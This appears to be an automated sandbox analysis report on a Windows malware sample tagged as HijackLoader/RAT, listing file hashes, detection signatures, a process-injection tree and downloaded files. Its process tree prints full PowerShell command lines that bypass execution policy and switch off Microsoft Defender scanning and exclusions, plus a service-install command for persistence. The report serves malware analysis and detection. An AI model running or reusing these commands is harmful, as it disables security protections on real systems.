Analysis
  max time kernel: 124s
  max time network: 138s
  platform: windows10-2004_x64
  resource: win10v2004-20240802-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 24-09-2024 03:29
Static task: static1
Behavioral task: behavioral1
  Sample: 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
  Resource: win7-20240903-en
General
  Target: 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
  Size: 18.9MB
  MD5: 4dfdae8af85639b2c395c7b10c6bf896
  SHA1: 347bef6b6b30d1caf3af7e8709fefeec2a277071
  SHA256: b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf
  SHA512: dcfd495f4012c051d5a5fdff7b77c8db65ef4036a6eb6d6ffe8e359f6625a4daea5dd4c851e3bc033b8eedcba09648592f02039d3ba11cd8a39f5f9a98272186
  SSDEEP: 393216:g8g8THhdWnaqtvylAjWZ0Xq9YLuxMfCVb2z:Zg8mhtvylAjWZ0Xq9YLuxMfCVKz
Malware Config
Signatures
- Detects MeshAgent payload (1 IoC)
  Processes:
    resource: C:\Users\Admin\AppData\Local\naver\naver.exe
    yara_rule: family_meshagent
- Blocklisted process makes network request (3 IoCs)
  Processes: powershell.exe
    flow | pid  | process
    20   | 3660 | powershell.exe
    22   | 3660 | powershell.exe
    23   | 3660 | powershell.exe
- Command and Scripting Interpreter: PowerShell
  Processes: powershell.exe, powershell.exe, powershell.exe
    pid  | process
    2868 | powershell.exe
    2064 | powershell.exe
    3976 | powershell.exe
- Sets service image path in registry (2 TTPs, 1 IoC)
  Processes: naver.exe
    description: Set value (str)
    ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\""
    process: naver.exe
- Executes dropped EXE (2 IoCs)
  Processes: naver.exe, naver.exe
    pid  | process
    5036 | naver.exe
    2192 | naver.exe
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Drops file in System32 directory (64 IoCs)
- Modifies data under HKEY_USERS (52 IoCs)
- Modifies system certificate store
  Processes: 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
    description      | ioc
    Key created      | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob value not present on the page]
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob value not present on the page]
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (30 IoCs)
  Processes: 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe, powershell.exe, msedge.exe, chrome.exe, naver.exe
    description                       | pid  | process                                                                      | target process
    PID 4304 wrote to memory of 3660  | 4304 | 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | powershell.exe
    PID 4304 wrote to memory of 3660  | 4304 | 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | powershell.exe
    PID 4304 wrote to memory of 2064  | 4304 | 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | powershell.exe
    PID 4304 wrote to memory of 2064  | 4304 | 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | powershell.exe
    PID 3660 wrote to memory of 4044  | 3660 | powershell.exe                                                               | msedge.exe
    PID 3660 wrote to memory of 4044  | 3660 | powershell.exe                                                               | msedge.exe
    PID 3660 wrote to memory of 4044  | 3660 | powershell.exe                                                               | msedge.exe
    PID 3660 wrote to memory of 4044  | 3660 | powershell.exe                                                               | msedge.exe
    PID 4044 wrote to memory of 2532  | 4044 | msedge.exe                                                                   | chrome.exe
    PID 4044 wrote to memory of 2532  | 4044 | msedge.exe                                                                   | chrome.exe
    PID 4044 wrote to memory of 2532  | 4044 | msedge.exe                                                                   | chrome.exe
    PID 4044 wrote to memory of 2532  | 4044 | msedge.exe                                                                   | chrome.exe
    PID 2532 wrote to memory of 3976  | 2532 | chrome.exe                                                                   | powershell.exe
    PID 2532 wrote to memory of 3976  | 2532 | chrome.exe                                                                   | powershell.exe
    PID 2532 wrote to memory of 5036  | 2532 | chrome.exe                                                                   | naver.exe
    PID 2532 wrote to memory of 5036  | 2532 | chrome.exe                                                                   | naver.exe
    PID 2192 wrote to memory of 692   | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 692   | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 516   | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 516   | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 2216  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 2216  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 1652  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 1652  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 4600  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 4600  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 1820  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 1820  | 2192 | naver.exe                                                                    | wmic.exe
    PID 2192 wrote to memory of 2868  | 2192 | naver.exe                                                                    | powershell.exe
    PID 2192 wrote to memory of 2868  | 2192 | naver.exe                                                                    | powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe (PID 4304)
  Command line: "C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2064)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3660)
    Command line: powershell -
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4044)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2532)
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3976)
          Command line: powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
        - C:\Users\Admin\AppData\Local\naver\naver.exe (PID 5036)
          Command line: C:\Users\Admin\AppData\Local\naver\naver.exe -install
          - Sets service image path in registry
          - Executes dropped EXE
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1392)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
- C:\Users\Admin\AppData\Local\naver\naver.exe (PID 2192)
  Command line: "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\wbem\wmic.exe (PID 692)
    Command line: wmic SystemEnclosure get ChassisTypes
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wbem\wmic.exe (PID 516)
    Command line: wmic os get oslanguage /FORMAT:LIST
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\wbem\wmic.exe (PID 2216)
    Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wbem\wmic.exe (PID 1652)
    Command line: wmic os get oslanguage /FORMAT:LIST
  - C:\Windows\System32\wbem\wmic.exe (PID 4600)
    Command line: wmic SystemEnclosure get ChassisTypes
  - C:\Windows\System32\wbem\wmic.exe (PID 1820)
    Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2868)
    Command line: powershell -noprofile -nologo -command -
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- Filesize: 53KB
  MD5: a26df49623eff12a70a93f649776dab7
  SHA1: efb53bd0df3ac34bd119adf8788127ad57e53803
  SHA256: 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
  SHA512: e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
- Filesize: 1KB
  MD5: e89c193840c8fb53fc3de104b1c4b092
  SHA1: 8b41b6a392780e48cc33e673cf4412080c42981e
  SHA256: 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
  SHA512: 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 5.3MB
  MD5: c41e8324cb68c07c2bbff56d645cae53
  SHA1: 13518a95a782ea595aff1e7f15397d2968738718
  SHA256: 4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917
  SHA512: 7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b
- Filesize: 22KB
  MD5: 2dd515ea546a81398d94dd15e3b4d55c
  SHA1: eb0b0fca721a296906166b7e972559b87353b726
  SHA256: becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
  SHA512: 439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb